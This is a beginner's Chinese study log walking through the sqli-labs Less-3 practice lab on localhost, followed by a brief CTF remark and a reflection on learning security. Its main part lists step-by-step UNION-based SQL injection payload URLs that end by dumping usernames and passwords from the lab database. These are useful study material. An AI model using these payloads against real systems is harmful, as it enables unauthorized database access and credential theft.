一
Sqli-labs:
由于是完全的新手,所以有很多都不太了解,嗯sqli-labs我做了第一第二第三关,原理都差不多所以以第三关为例:
不知道为什么我的PHPstudy启动总是有问题。
于是每次都得自己手动开启MySQL的服务:
好了启动成功,开始进入正题。
2021/1/31:
1.判断是否有SQL注入
http://127.0.0.1/sqli/Less-3/?id=1
http://127.0.0.1/sqli/Less-3/?id=1’
由于两次结果的显示明显不同,因此判断存在SQL注入漏洞
2.看报错信息
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near ‘‘1’’) LIMIT 0,1’ at line 1
3.构造正确的SQL语句
http://127.0.0.1/sqli/Less-3/?id=1’)–+
4.判断列数
显示正常:http://127.0.0.1/sqli/Less-3/?id=1’) order by 3–+
显示不正常:http://127.0.0.1/sqli/Less-3/?id=1’) order by 4–+
5.判断回显位置
http://127.0.0.1/sqli/Less-3/?id=-1’) union select 1,2,3–+
6.利用回显点进行爆库,爆表,爆列,最后拿到用户私有信息
http://127.0.0.1/sqli/Less-3/?id=-1’) union select 1,2,group_concat(schema_name) from information_schema.schemata–+
http://127.0.0.1/sqli/Less-3/?id=-1’) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+
http://127.0.0.1/sqli/Less-3/?id=-1’) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+
http://127.0.0.1/sqli/Less-3/?id=-1’) union select 1,2,group_concat(concat(0x7e,username,password)) from security.users --+
得到数据库中的有用信息:
二
**CTF:**嗯之前做的,有点忘记怎么做的了,不过因为不太会所以,我是看着评论区的来做的。不是很理解为什么这些题是这样的,因为跟以前做的题都不一样。
总结:
这一周,我花在安环境的时间都比做作业的时间多,同时还不幸发现自己的电脑存在许多木马和流氓软件,于是花了不少时间清除电脑木马和流氓软件上,突然就觉得网络安全是一个很有意义并且很有趣的事业,但是很有可能是因为自己了解的还太少了,同时万事开头难,很多都不懂,查找资料这些也不知道该从何开始。慢慢来吧。
虽然是小白,但是我会努力的。业精于勤荒于嬉。